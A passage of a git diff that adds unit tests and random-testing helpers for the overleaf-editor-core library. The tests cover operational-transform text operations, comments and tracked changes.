expect(fileData.getStringLength()).to.equal(longString.length) + + expect(() => { + fileData.edit(new TextOperation().retain(longString.length).insert('x')) + }).to.throw(TextOperation.TooLongError) + expect(fileData.getByteLength()).to.equal(longString.length) + expect(fileData.getStringLength()).to.equal(longString.length) + + fileData.edit(new TextOperation().retain(longString.length - 1).remove(1)) + expect(fileData.getByteLength()).to.equal(longString.length - 1) + 
expect(fileData.getStringLength()).to.equal(longString.length - 1) + }) + + it('getComments() should return an empty array', function () { + const fileData = new StringFileData('test') + expect(fileData.getComments().toRaw()).to.eql([]) + }) + + it('creates StringFileData with comments', function () { + const fileData = new StringFileData('test', [ + { + id: 'comm1', + ranges: [ + { + pos: 5, + length: 10, + }, + ], + }, + { + id: 'comm2', + ranges: [ + { + pos: 20, + length: 5, + }, + ], + }, + ]) + + expect(fileData.getComments().toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 10 }] }, + { id: 'comm2', ranges: [{ pos: 20, length: 5 }] }, + ]) + }) + + it('fromRaw() should create StringFileData with comments', function () { + const fileData = StringFileData.fromRaw({ + content: 'test', + comments: [ + { + id: 'comm1', + ranges: [ + { + pos: 5, + length: 10, + }, + ], + }, + { + id: 'comm2', + ranges: [ + { + pos: 20, + length: 5, + }, + ], + resolved: true, + }, + ], + }) + + expect(fileData.getComments().toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 10 }] }, + { id: 'comm2', ranges: [{ pos: 20, length: 5 }], resolved: true }, + ]) + }) + + it('getContent should filter out tracked deletions when passed option', function () { + const fileData = new StringFileData( + 'the quick brown fox jumps over the lazy dog', + undefined, + [ + { + range: { pos: 4, length: 6 }, + tracking: { + type: 'delete', + ts: '2024-01-01T00:00:00.000Z', + userId: 'user1', + }, + }, + { + range: { pos: 35, length: 5 }, + tracking: { + type: 'delete', + ts: '2023-01-01T00:00:00.000Z', + userId: 'user2', + }, + }, + ] + ) + + expect(fileData.getContent()).to.equal( + 'the quick brown fox jumps over the lazy dog' + ) + expect(fileData.getContent({ filterTrackedDeletes: true })).to.equal( + 'the brown fox jumps over the dog' + ) + }) + + it('getContent should keep tracked insertions when passed option to remove tracked changes', function () { + const fileData = new StringFileData( + 'the quick brown fox jumps over the lazy dog', + undefined, + [ + { + range: { pos: 4, length: 6 }, + tracking: { + type: 'insert', + ts: '2024-01-01T00:00:00.000Z', + userId: 'user1', + }, + }, + { + range: { pos: 35, length: 5 }, + tracking: { + type: 'delete', + ts: '2023-01-01T00:00:00.000Z', + userId: 'user2', + }, + }, + ] + ) + + expect(fileData.getContent()).to.equal( + 'the quick brown fox jumps over the lazy dog' + ) + expect(fileData.getContent({ filterTrackedDeletes: true })).to.equal( + 'the quick brown fox jumps over the dog' + ) + }) +}) diff --git a/libraries/overleaf-editor-core/test/support/fake_blob_store.js b/libraries/overleaf-editor-core/test/support/fake_blob_store.js new file mode 100644 index 0000000..2b6ad7c --- /dev/null +++ b/libraries/overleaf-editor-core/test/support/fake_blob_store.js @@ -0,0 +1,30 @@ +/** + * @import { Blob } from "../.." 
+ */ + +/** + * Fake blob store for tests + */ +class FakeBlobStore { + /** + * Get a string from the blob store + * + * @param {string} hash + * @return {Promise<string>} + */ + getString(hash) { + throw new Error('Not implemented') + } + + /** + * Store a string in the blob store + * + * @param {string} content + * @return {Promise<Blob>} + */ + putString(content) { + throw new Error('Not implemented') + } +} + +module.exports = FakeBlobStore diff --git a/libraries/overleaf-editor-core/test/support/random.js b/libraries/overleaf-editor-core/test/support/random.js new file mode 100644 index 0000000..76fad2e --- /dev/null +++ b/libraries/overleaf-editor-core/test/support/random.js @@ -0,0 +1,66 @@ +// +// Randomised testing helpers from OT.js: +// https://github.com/Operational-Transformation/ot.js/blob/ +// 8873b7e28e83f9adbf6c3a28ec639c9151a838ae/test/helpers.js +// +'use strict' + +function randomInt(n) { + return Math.floor(Math.random() * n) +} + +function randomString(n, newLine = true) { + let str = '' + while (n--) { + if (newLine && Math.random() < 0.15) { + str += '\n' + } else { + const chr = randomInt(26) + 97 + str += String.fromCharCode(chr) + } + } + return str +} + +function randomElement(arr) { + return arr[randomInt(arr.length)] +} + +function randomTest(numTrials, test) { + return function () { + while (numTrials--) test() + } +} + +function randomSubset(arr) { + const n = randomInt(arr.length) + const subset = [] + const indices = [] + for (let i = 0; i < arr.length; i++) indices.push(i) + for (let i = 0; i < n; i++) { + const index = randomInt(indices.length) + subset.push(arr[indices[index]]) + indices.splice(index, 1) + } + return subset +} + +function randomComments(number) { + const ids = new Set() + const comments = [] + while (comments.length < number) { + const id = randomString(10, false) + if (!ids.has(id)) { + comments.push({ id, ranges: [], resolved: false }) + ids.add(id) + } + } + return { ids: Array.from(ids), comments } +} + +exports.int = randomInt +exports.string = randomString +exports.element = randomElement +exports.test = randomTest +exports.comments = randomComments +exports.subset = randomSubset diff --git a/libraries/overleaf-editor-core/test/support/random_text_operation.js b/libraries/overleaf-editor-core/test/support/random_text_operation.js new file mode 100644 index 0000000..a600cdc --- /dev/null +++ b/libraries/overleaf-editor-core/test/support/random_text_operation.js @@ -0,0 +1,57 @@ +const TrackingProps = require('../../lib/file_data/tracking_props') +const ClearTrackingProps = require('../../lib/file_data/clear_tracking_props') +const TextOperation = require('../../lib/operation/text_operation') +const random = require('./random') + +/** + * + * @param {string} str + * @param {string[]} [commentIds] + * @returns {TextOperation} + */ +function randomTextOperation(str, commentIds) { + const operation = new TextOperation() + let left + while (true) { + left = str.length - operation.baseLength + if (left === 0) break + const r = Math.random() + const l = 1 + random.int(Math.min(left - 1, 20)) + const trackedChange = + Math.random() < 0.1 + ? 
new TrackingProps( + random.element(['insert', 'delete']), + random.element(['user1', 'user2', 'user3']), + new Date( + random.element([ + '2024-01-01T00:00:00.000Z', + '2023-01-01T00:00:00.000Z', + '2022-01-01T00:00:00.000Z', + ]) + ) + ) + : undefined + if (r < 0.2) { + let operationCommentIds + if (commentIds?.length > 0 && Math.random() < 0.3) { + operationCommentIds = random.subset(commentIds) + } + operation.insert(random.string(l), { + tracking: trackedChange, + commentIds: operationCommentIds, + }) + } else if (r < 0.4) { + operation.remove(l) + } else if (r < 0.5) { + operation.retain(l, { tracking: new ClearTrackingProps() }) + } else { + operation.retain(l, { tracking: trackedChange }) + } + } + if (Math.random() < 0.3) { + operation.insert(1 + random.string(10)) + } + return operation +} + +module.exports = randomTextOperation diff --git a/libraries/overleaf-editor-core/test/text_operation.test.js b/libraries/overleaf-editor-core/test/text_operation.test.js new file mode 100644 index 0000000..fa9bc62 --- /dev/null +++ b/libraries/overleaf-editor-core/test/text_operation.test.js @@ -0,0 +1,879 @@ +// @ts-check +// +// These tests are based on the OT.js tests: +// https://github.com/Operational-Transformation/ot.js/blob/ +// 8873b7e28e83f9adbf6c3a28ec639c9151a838ae/test/lib/test-text-operation.js +// +'use strict' + +const { expect } = require('chai') +const random = require('./support/random') +const randomOperation = require('./support/random_text_operation') + +const ot = require('..') +const TextOperation = ot.TextOperation +const StringFileData = require('../lib/file_data/string_file_data') +const { RetainOp, InsertOp, RemoveOp } = require('../lib/operation/scan_op') +const TrackingProps = require('../lib/file_data/tracking_props') +const ClearTrackingProps = require('../lib/file_data/clear_tracking_props') + +describe('TextOperation', function () { + const numTrials = 500 + + it('tracks base and target lengths', function () { + const o = new TextOperation() + expect(o.baseLength).to.equal(0) + expect(o.targetLength).to.equal(0) + o.retain(5) + expect(o.baseLength).to.equal(5) + expect(o.targetLength).to.equal(5) + o.insert('abc') + expect(o.baseLength).to.equal(5) + expect(o.targetLength).to.equal(8) + o.retain(2) + expect(o.baseLength).to.equal(7) + expect(o.targetLength).to.equal(10) + o.remove(2) + expect(o.baseLength).to.equal(9) + expect(o.targetLength).to.equal(10) + }) + + it('supports chaining', function () { + const o = new TextOperation() + .retain(5) + .retain(0) + .insert('lorem') + .insert('') + .remove('abc') + .remove(3) + .remove(0) + .remove('') + expect(o.ops.length).to.equal(3) + }) + + it('ignores empty operations', function () { + const o = new TextOperation() + o.retain(0) + o.insert('') + o.remove('') + expect(o.ops.length).to.equal(0) + }) + + it('checks for equality', function () { + const op1 = new TextOperation().remove(1).insert('lo').retain(2).retain(3) + const op2 = new TextOperation().remove(-1).insert('l').insert('o').retain(5) + expect(op1.equals(op2)).to.be.true + op1.remove(1) + op2.retain(1) + expect(op1.equals(op2)).to.be.false + }) + + it('merges ops', function () { + function last(arr) { + return arr[arr.length - 1] + } + const o = new TextOperation() + expect(o.ops.length).to.equal(0) + o.retain(2) + expect(o.ops.length).to.equal(1) + expect(last(o.ops).equals(new RetainOp(2))).to.be.true + o.retain(3) + expect(o.ops.length).to.equal(1) + expect(last(o.ops).equals(new RetainOp(5))).to.be.true + o.insert('abc') + 
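+ // an insert cannot be merged into the preceding retain, so a new op is appended; the consecutive inserts below do merge into one InsertOp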
expect(o.ops.length).to.equal(2) + expect(last(o.ops).equals(new InsertOp('abc'))).to.be.true + o.insert('xyz') + expect(o.ops.length).to.equal(2) + expect(last(o.ops).equals(new InsertOp('abcxyz'))).to.be.true + o.remove('d') + expect(o.ops.length).to.equal(3) + expect(last(o.ops).equals(new RemoveOp(1))).to.be.true + o.remove('d') + expect(o.ops.length).to.equal(3) + expect(last(o.ops).equals(new RemoveOp(2))).to.be.true + }) + + it('checks for no-ops', function () { + const o = new TextOperation() + expect(o.isNoop()).to.be.true + o.retain(5) + expect(o.isNoop()).to.be.true + o.retain(3) + expect(o.isNoop()).to.be.true + o.insert('lorem') + expect(o.isNoop()).to.be.false + }) + + it('converts to string', function () { + const o = new TextOperation() + o.retain(2) + o.insert('lorem') + o.remove('ipsum') + o.retain(5) + expect(o.toString()).to.equal( + "retain 2, insert 'lorem', remove 5, retain 5" + ) + }) + + it('converts from JSON', function () { + const ops = [2, -1, -1, 'cde'] + const o = TextOperation.fromJSON({ textOperation: ops }) + expect(o.ops.length).to.equal(3) + expect(o.baseLength).to.equal(4) + expect(o.targetLength).to.equal(5) + + function assertIncorrectAfter(fn) { + const ops2 = ops.slice(0) + fn(ops2) + expect(() => { + TextOperation.fromJSON({ textOperation: ops2 }) + }).to.throw() + } + + assertIncorrectAfter(ops2 => { + ops2.push({ insert: 'x' }) + }) + assertIncorrectAfter(ops2 => { + ops2.push(null) + }) + }) + + it( + 'applies (randomised)', + random.test(numTrials, () => { + const str = random.string(50) + const comments = random.comments(6) + const o = randomOperation(str, comments.ids) + expect(str.length).to.equal(o.baseLength) + const file = new StringFileData(str, comments.comments) + o.apply(file) + const result = file.getContent() + expect(result.length).to.equal(o.targetLength) + }) + ) + + it( + 'converts to/from JSON (randomised)', + random.test(numTrials, () => { + const doc = random.string(50) + const comments = random.comments(2) + const operation = randomOperation(doc, comments.ids) + const roundTripOperation = TextOperation.fromJSON(operation.toJSON()) + expect(operation.equals(roundTripOperation)).to.be.true + }) + ) + + it('throws when invalid operations are applied', function () { + const operation = new TextOperation().retain(1) + expect(() => { + operation.apply(new StringFileData('')) + }).to.throw(TextOperation.ApplyError) + expect(() => { + operation.apply(new StringFileData(' ')) + }).not.to.throw() + }) + + it('throws when insert text contains non BMP chars', function () { + const operation = new TextOperation() + const str = '𝌆\n' + expect(() => { + operation.insert(str) + }).to.throw( + TextOperation.UnprocessableError, + /inserted text contains non BMP characters/ + ) + }) + + it('throws when base string contains non BMP chars', function () { + const operation = new TextOperation() + const str = '𝌆\n' + expect(() => { + operation.apply(new StringFileData(str)) + }).to.throw( + TextOperation.UnprocessableError, + /string contains non BMP characters/ + ) + }) + + it('throws in fromJSON when the operation contains non BMP chars', function () { + const operation = ['𝌆\n'] + expect(() => { + TextOperation.fromJSON({ textOperation: operation }) + }).to.throw( + TextOperation.UnprocessableError, + /inserted text contains non BMP characters/ + ) + }) + + describe('invert', function () { + it( + 'inverts (randomised)', + random.test(numTrials, () => { + const str = random.string(50) + const comments = random.comments(6) + const o = randomOperation(str, 
comments.ids) + const originalFile = new StringFileData(str, comments.comments) + const p = o.invert(originalFile) + expect(o.baseLength).to.equal(p.targetLength) + expect(o.targetLength).to.equal(p.baseLength) + const file = new StringFileData(str, comments.comments) + o.apply(file) + p.apply(file) + const result = file.toRaw() + expect(result).to.deep.equal(originalFile.toRaw()) + }) + ) + + it('re-inserts removed range and comment when inverting', function () { + expectInverseToLeadToInitialState( + new StringFileData( + 'foo bar baz', + [{ id: 'comment1', ranges: [{ pos: 4, length: 3 }] }], + [ + { + range: { pos: 4, length: 3 }, + tracking: { + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }, + }, + ] + ), + new TextOperation().retain(4).remove(4).retain(3) + ) + }) + + it('deletes inserted range and comment when inverting', function () { + expectInverseToLeadToInitialState( + new StringFileData('foo baz', [ + { id: 'comment1', ranges: [], resolved: false }, + ]), + new TextOperation() + .retain(4) + .insert('bar', { + commentIds: ['comment1'], + tracking: TrackingProps.fromRaw({ + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }), + }) + .insert(' ') + .retain(3) + ) + }) + + it('removes a tracked delete', function () { + expectInverseToLeadToInitialState( + new StringFileData('foo bar baz'), + new TextOperation() + .retain(4) + .retain(4, { + tracking: TrackingProps.fromRaw({ + ts: '2023-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user1', + }), + }) + .retain(3) + ) + }) + + it('restores comments that were removed', function () { + expectInverseToLeadToInitialState( + new StringFileData('foo bar baz', [ + { + id: 'comment1', + ranges: [{ pos: 4, length: 3 }], + resolved: false, + }, + ]), + new TextOperation().retain(4).remove(4).retain(3) + ) + }) + + it('re-inserting removed part of comment restores original comment range', function () { + expectInverseToLeadToInitialState( + new StringFileData('foo bar baz', [ + { + id: 'comment1', + ranges: [{ pos: 0, length: 11 }], + resolved: false, + }, + ]), + new TextOperation().retain(4).remove(4).retain(3) + ) + }) + + it('re-inserting removed part of tracked change restores tracked change range', function () { + expectInverseToLeadToInitialState( + new StringFileData('foo bar baz', undefined, [ + { + range: { pos: 0, length: 11 }, + tracking: { + ts: '2023-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user1', + }, + }, + ]), + new TextOperation().retain(4).remove(4).retain(3) + ) + }) + }) + + describe('compose', function () { + it( + 'composes (randomised)', + random.test(numTrials, () => { + // invariant: apply(str, compose(a, b)) === apply(apply(str, a), b) + const str = random.string(20) + const comments = random.comments(6) + const a = randomOperation(str, comments.ids) + const file = new StringFileData(str, comments.comments) + a.apply(file) + const afterA = file.toRaw() + expect(afterA.content.length).to.equal(a.targetLength) + const b = randomOperation(afterA.content, comments.ids) + b.apply(file) + const afterB = file.toRaw() + expect(afterB.content.length).to.equal(b.targetLength) + const ab = a.compose(b) + expect(ab.targetLength).to.equal(b.targetLength) + // apply the composed op to a fresh copy; the result must match a then b + const abFile = new StringFileData(str, comments.comments) + ab.apply(abFile) + const afterAB = abFile.toRaw() + expect(afterAB).to.deep.equal(afterB) + }) + ) + + it('composes two operations with comments', function () { + expect( + compose( + new StringFileData('foo baz', [ + { id: 'comment1', ranges: [], resolved: false }, + ]), + new 
TextOperation() + .retain(4) + .insert('bar', { + commentIds: ['comment1'], + tracking: TrackingProps.fromRaw({ + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }), + }) + .insert(' ') + .retain(3), + new TextOperation().retain(4).remove(4).retain(3) + ) + ).to.deep.equal({ + content: 'foo baz', + comments: [{ id: 'comment1', ranges: [] }], + }) + }) + + it('prioritizes tracked changes info from the latter operation', function () { + expect( + compose( + new StringFileData('foo bar baz'), + new TextOperation() + .retain(4) + .retain(4, { + tracking: TrackingProps.fromRaw({ + ts: '2023-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user1', + }), + }) + .retain(3), + new TextOperation() + .retain(4) + .retain(4, { + tracking: TrackingProps.fromRaw({ + ts: '2024-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user2', + }), + }) + .retain(3) + ) + ).to.deep.equal({ + content: 'foo bar baz', + trackedChanges: [ + { + range: { pos: 4, length: 4 }, + tracking: { + ts: '2024-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user2', + }, + }, + ], + }) + }) + + it('does not remove tracked change if not overridden by operation 2', function () { + expect( + compose( + new StringFileData('foo bar baz'), + new TextOperation() + .retain(4) + .retain(4, { + tracking: TrackingProps.fromRaw({ + ts: '2023-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user1', + }), + }) + .retain(3), + new TextOperation().retain(11) + ) + ).to.deep.equal({ + content: 'foo bar baz', + trackedChanges: [ + { + range: { pos: 4, length: 4 }, + tracking: { + ts: '2023-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user1', + }, + }, + ], + }) + }) + + it('adds comment ranges from both operations', function () { + expect( + compose( + new StringFileData('foo bar baz', [ + { + id: 'comment1', + ranges: [{ pos: 4, length: 3 }], + resolved: false, + }, + { + id: 'comment2', + ranges: [{ pos: 8, length: 3 }], + resolved: false, + }, + ]), + new TextOperation() + .retain(5) + .insert('aa', { + commentIds: ['comment1'], + }) + .retain(6), + new TextOperation() + .retain(11) + .insert('bb', { commentIds: ['comment2'] }) + .retain(2) + ) + ).to.deep.equal({ + content: 'foo baaar bbbaz', + comments: [ + { id: 'comment1', ranges: [{ pos: 4, length: 5 }] }, + { id: 'comment2', ranges: [{ pos: 10, length: 5 }] }, + ], + }) + }) + + it('removes the tracking range from a tracked delete if operation 2 resolves it', function () { + expect( + compose( + new StringFileData('foo bar baz'), + new TextOperation() + .retain(4) + .retain(4, { + tracking: TrackingProps.fromRaw({ + ts: '2023-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user1', + }), + }) + .retain(3), + new TextOperation() + .retain(4) + .retain(4, { + tracking: new ClearTrackingProps(), + }) + .retain(3) + ) + ).to.deep.equal({ + content: 'foo bar baz', + }) + }) + + it('removes the tracking from an insert if operation 2 resolves it', function () { + expect( + compose( + new StringFileData('foo bar baz'), + new TextOperation() + .retain(4) + .insert('quux ', { + tracking: TrackingProps.fromRaw({ + ts: '2023-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }), + }) + .retain(7), + new TextOperation() + .retain(6) + .retain(5, { + tracking: new ClearTrackingProps(), + }) + .retain(5) + ) + ).to.deep.equal({ + content: 'foo quux bar baz', + trackedChanges: [ + { + range: { pos: 4, length: 2 }, + tracking: { + ts: '2023-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }, + }, + ], + }) + }) + }) + + 
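+ // In the compose tests above, a retain with `tracking: new ClearTrackingProps()` models resolving a tracked change: composing it clears the corresponding tracking range.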
describe('transform', function () { + it( + 'transforms (randomised)', + random.test(numTrials, () => { + // invariant: compose(a, b') = compose(b, a') + // where (a', b') = transform(a, b) + const str = random.string(20) + const comments = random.comments(6) + const a = randomOperation(str, comments.ids) + const b = randomOperation(str, comments.ids) + const primes = TextOperation.transform(a, b) + const aPrime = primes[0] + const bPrime = primes[1] + const abPrime = a.compose(bPrime) + const baPrime = b.compose(aPrime) + const abFile = new StringFileData(str, comments.comments) + const baFile = new StringFileData(str, comments.comments) + abPrime.apply(abFile) + baPrime.apply(baFile) + expect(abPrime.equals(baPrime)).to.be.true + expect(abFile.toRaw()).to.deep.equal(baFile.toRaw()) + }) + ) + + it('adds a tracked change from operation 1', function () { + expect( + transform( + new StringFileData('foo baz'), + new TextOperation() + .retain(4) + .insert('bar', { + tracking: TrackingProps.fromRaw({ + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }), + }) + .insert(' ') + .retain(3), + new TextOperation().retain(7).insert(' qux') + ) + ).to.deep.equal({ + content: 'foo bar baz qux', + trackedChanges: [ + { + range: { pos: 4, length: 3 }, + tracking: { + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }, + }, + ], + }) + }) + + it('prioritizes tracked change from the first operation', function () { + expect( + transform( + new StringFileData('foo bar baz'), + new TextOperation() + .retain(4) + .retain(4, { + tracking: TrackingProps.fromRaw({ + ts: '2023-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user1', + }), + }) + .retain(3), + new TextOperation() + .retain(4) + .retain(4, { + tracking: TrackingProps.fromRaw({ + ts: '2024-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user2', + }), + }) + .retain(3) + ) + ).to.deep.equal({ + content: 'foo bar baz', + trackedChanges: [ + { + range: { pos: 4, length: 4 }, + tracking: { + ts: '2023-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user1', + }, + }, + ], + }) + }) + + it('splits a tracked change in two to resolve conflicts', function () { + expect( + transform( + new StringFileData('foo bar baz'), + new TextOperation() + .retain(4) + .retain(4, { + tracking: TrackingProps.fromRaw({ + ts: '2023-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user1', + }), + }) + .retain(3), + new TextOperation() + .retain(4) + .retain(5, { + tracking: TrackingProps.fromRaw({ + ts: '2024-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user2', + }), + }) + .retain(2) + ) + ).to.deep.equal({ + content: 'foo bar baz', + trackedChanges: [ + { + range: { pos: 4, length: 4 }, + tracking: { + ts: '2023-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user1', + }, + }, + { + range: { pos: 8, length: 1 }, + tracking: { + ts: '2024-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user2', + }, + }, + ], + }) + }) + + it('inserts a tracked change from operation 2 after a tracked change from operation 1', function () { + expect( + transform( + new StringFileData('aaabbbccc'), + new TextOperation() + .retain(3) + .insert('xxx', { + tracking: TrackingProps.fromRaw({ + ts: '2023-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }), + }) + .retain(6), + new TextOperation() + .retain(3) + .insert('yyy', { + tracking: TrackingProps.fromRaw({ + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user2', + }), + }) + .retain(6) + ) + ).to.deep.equal({ + content: 'aaaxxxyyybbbccc', + 
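+ // user1's insert from operation 1 is ordered before user2's insert from operation 2 at the same position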
trackedChanges: [ + { + range: { pos: 3, length: 3 }, + tracking: { + ts: '2023-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }, + }, + { + range: { pos: 6, length: 3 }, + tracking: { + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user2', + }, + }, + ], + }) + }) + + it('preserves a comment even if it is completely removed in one operation', function () { + expect( + transform( + new StringFileData('foo bar baz', [ + { + id: 'comment1', + ranges: [{ pos: 4, length: 3 }], + resolved: false, + }, + ]), + new TextOperation().retain(4).remove(4).retain(3), + new TextOperation() + .retain(7) + .insert('qux ', { + commentIds: ['comment1'], + }) + .retain(4) + ) + ).to.deep.equal({ + content: 'foo qux baz', + comments: [{ id: 'comment1', ranges: [{ pos: 4, length: 4 }] }], + }) + }) + + it('extends a comment to both ranges if both operations add text in it', function () { + expect( + transform( + new StringFileData('foo bar baz', [ + { + id: 'comment1', + ranges: [{ pos: 4, length: 3 }], + resolved: false, + }, + ]), + new TextOperation() + .retain(4) + .insert('qux ', { + commentIds: ['comment1'], + }) + .retain(7), + new TextOperation() + .retain(4) + .insert('corge ', { commentIds: ['comment1'] }) + .retain(7) + ) + ).to.deep.equal({ + content: 'foo qux corge bar baz', + comments: [{ id: 'comment1', ranges: [{ pos: 4, length: 13 }] }], + }) + }) + + it('adds a tracked change from both operations at different places', function () { + expect( + transform( + new StringFileData('foo bar baz'), + new TextOperation() + .retain(4) + .insert('qux ', { + tracking: TrackingProps.fromRaw({ + ts: '2023-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }), + }) + .retain(7), + new TextOperation() + .retain(8) + .insert('corge ', { + tracking: TrackingProps.fromRaw({ + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user2', + }), + }) + .retain(3) + ) + ).to.deep.equal({ + content: 'foo qux bar corge baz', + trackedChanges: [ + { + range: { pos: 4, length: 4 }, + tracking: { + ts: '2023-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }, + }, + { + range: { pos: 12, length: 6 }, + tracking: { + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user2', + }, + }, + ], + }) + }) + }) +}) + +function expectInverseToLeadToInitialState(fileData, operation) { + const initialState = fileData + const result = initialState.toRaw() + const invertedOperation = operation.invert(initialState) + operation.apply(initialState) + invertedOperation.apply(initialState) + const invertedResult = initialState.toRaw() + expect(invertedResult).to.deep.equal(result) +} + +function compose(fileData, op1, op2) { + const copy = StringFileData.fromRaw(fileData.toRaw()) + op1.apply(fileData) + op2.apply(fileData) + const result1 = fileData.toRaw() + + const composed = op1.compose(op2) + composed.apply(copy) + const result2 = copy.toRaw() + + expect(result1).to.deep.equal(result2) + return fileData.toRaw() +} + +function transform(fileData, a, b) { + const initialState = fileData + const aFileData = StringFileData.fromRaw(initialState.toRaw()) + const bFileData = StringFileData.fromRaw(initialState.toRaw()) + + const [aPrime, bPrime] = TextOperation.transform(a, b) + a.apply(aFileData) + bPrime.apply(aFileData) + b.apply(bFileData) + aPrime.apply(bFileData) + + const resultA = aFileData.toRaw() + const resultB = bFileData.toRaw() + expect(resultA).to.deep.equal(resultB) + + return aFileData.toRaw() +} diff --git 
a/libraries/overleaf-editor-core/test/tracked_change.test.js b/libraries/overleaf-editor-core/test/tracked_change.test.js new file mode 100644 index 0000000..8837812 --- /dev/null +++ b/libraries/overleaf-editor-core/test/tracked_change.test.js @@ -0,0 +1,55 @@ +// @ts-check +const TrackedChange = require('../lib/file_data/tracked_change') +const Range = require('../lib/range') +const TrackingProps = require('../lib/file_data/tracking_props') +const { expect } = require('chai') + +describe('TrackedChange', function () { + it('should survive serialization', function () { + const trackedChange = new TrackedChange( + new Range(1, 2), + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + const newTrackedChange = TrackedChange.fromRaw(trackedChange.toRaw()) + expect(newTrackedChange).to.be.instanceOf(TrackedChange) + expect(newTrackedChange).to.deep.equal(trackedChange) + }) + + it('can be created from a raw object', function () { + const trackedChange = TrackedChange.fromRaw({ + range: { pos: 1, length: 2 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }) + expect(trackedChange).to.be.instanceOf(TrackedChange) + expect(trackedChange).to.deep.equal( + new TrackedChange( + new Range(1, 2), + new TrackingProps( + 'insert', + 'user1', + new Date('2024-01-01T00:00:00.000Z') + ) + ) + ) + }) + + it('can be serialized to a raw object', function () { + const change = new TrackedChange( + new Range(1, 2), + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + expect(change).to.be.instanceOf(TrackedChange) + expect(change.toRaw()).to.deep.equal({ + range: { pos: 1, length: 2 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }) + }) +}) diff --git a/libraries/overleaf-editor-core/test/tracked_change_list.test.js b/libraries/overleaf-editor-core/test/tracked_change_list.test.js new file mode 100644 index 0000000..6cf47f0 --- /dev/null +++ b/libraries/overleaf-editor-core/test/tracked_change_list.test.js @@ -0,0 +1,869 @@ +// @ts-check +const TrackedChangeList = require('../lib/file_data/tracked_change_list') +const TrackingProps = require('../lib/file_data/tracking_props') +const ClearTrackingProps = require('../lib/file_data/clear_tracking_props') +const { expect } = require('chai') +/** @import { TrackedChangeRawData } from '../lib/types' */ + +describe('TrackedChangeList', function () { + describe('applyInsert', function () { + describe('with same author', function () { + it('should merge consecutive tracked changes and use the latest timestamp', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 3 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(3, 'foo', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(1) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 6 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should extend tracked changes when inserting in the middle', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(5, 'foobar', { + tracking: 
TrackingProps.fromRaw({ + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(1) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 16 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should merge two tracked changes starting at the same position', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 3 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(0, 'foo', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(1) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 6 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should not extend range when there is a gap between the ranges', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 3 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(4, 'foobar', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user1', + ts: 